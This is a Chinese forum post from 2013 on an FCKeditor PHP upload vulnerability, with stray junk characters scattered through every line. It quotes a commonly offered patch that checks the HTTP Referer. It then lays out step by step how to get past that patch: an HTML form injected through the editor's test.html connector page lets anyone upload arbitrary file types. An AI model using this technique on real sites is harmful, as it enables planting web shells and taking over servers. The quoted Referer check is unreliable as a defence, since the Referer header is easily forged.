漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php
& p) C8 `: `& z( A网上给出的修复方案是
( L" ^8 H) @ c修复方法,删除FCK编辑器用其他的编辑器4 _% X( x" P5 k
或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件5 j& M7 g9 |- e4 h) M9 I( w! ]
在
( X( k# Y5 `8 _+ I' X* ?require(‘config.php’);2 G4 R" i; C( e6 v
require(‘util.php’);) X& `6 ^. l: M$ n
的下面添加以下代码—————————–' O0 U/ i' I# p. i* u& y2 ^ _
//防止外部提交9 O& [1 m3 [' f1 a0 W" E, q
function outsidepost()5 `9 _* s0 B$ |( N
{' j) G% K* _, ^, q, h+ |/ e
$servername=$_SERVER['SERVER_NAME'];# t; L+ X) b! A; h! v: Z5 ]
$sub_from=@$_SERVER['HTTP_REFERER'];% \! N3 W6 x! s, _1 j
$sub_len=strlen($servername);
% i9 h. ~; Z" P$checkfrom=substr($sub_from,7,$sub_len);( V3 D% f7 Q- A% b1 a, ^
if($checkfrom!=$servername){; p* I9 C" _4 Y5 S" j5 L
echo(“you don’t outsidepost!”);
7 y9 ]1 ?4 ^. hexit;+ c# H) l6 p) I/ _7 G& L+ y" U
}6 J) V; d5 P# k: c" v( z
}6 ]2 W- [# a7 [, S: M/ h. V; A3 Z
outsidepost();" l5 p* V3 @8 a" p& `
防止外部提交,但是没有防止内部提交,+ l$ n& I1 \0 g1 s# r/ g$ t
利用方法:
) S+ Y8 Y" x$ ]/ l/ L/ v1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html! m' T8 D% ]* |4 d- h* e9 ?% v
2,在Current Folder 框输入% Y% H- }0 [ J0 M1 \
<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>
0 ~- P# L# {8 Y( G7 ] i* B+ }然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。- a* F% n: n. F7 w) R% V/ k
PS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。 |
发表于 2013-1-11 21:12:44
收藏
支持
反对